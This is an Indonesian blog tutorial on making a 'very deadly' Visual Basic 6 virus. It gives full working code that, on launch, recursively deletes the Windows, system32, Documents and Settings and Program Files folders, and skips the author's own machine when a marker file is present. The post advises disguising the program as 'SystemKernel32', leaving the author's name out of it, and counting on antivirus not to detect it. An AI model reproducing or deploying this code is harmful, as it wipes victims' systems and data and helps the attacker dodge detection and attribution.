Virus visual basic 1

|
halo sobat ku, kali ini saya akan memberikan sedikit tutorial cara membuat virus dengan menggunakan Visual Basic 6.0..
tutorial buat bikin virus sangat mematikan, tapi simple, dan kayanya sih ga bakal kedekteksi antivirus, soalnya cara kerjanya simple banget.




yang anda perlukan antara lain adalah sebagai berikut :
1. VB(optimal : 6.0)
apabila anda ingin mendownload Visual Basic 6.0, klik disini
2. Ngerti tombol2nya VB

tutorialnya begini sob, :

1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub


Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub


Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3.

Kode yg berwarna biru itu adalah penangkal nih virus sob,  jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang sendiri… bisa kamu edit kok jadi apa gitu…

Yang berwarna merah itu folder yg bakal didelete ama nih virus, kamu edit sendiri aja…

4. Bikin nih project namanya kaya nama system, disini aku memakai nama “SystemKernel32″ jadi ga bakal dicurigain.

5. jangan pernah nulis nama kamu di project ini, okey friend?

6. terakhir ya tinggal di compile deh… 

gimana sob, mudah sekali kan?..  
 sangat Simple kan? nih virus kerjanya  ngapus system, jadi sengat berbahaya sekali … ini cman contoh bikin virus…atukah anda tertarik ingin menghack game online? baca disini.. sekian dan terimakasih...

0 komentar:

Poskan Komentar

Next Prev
▲Top▲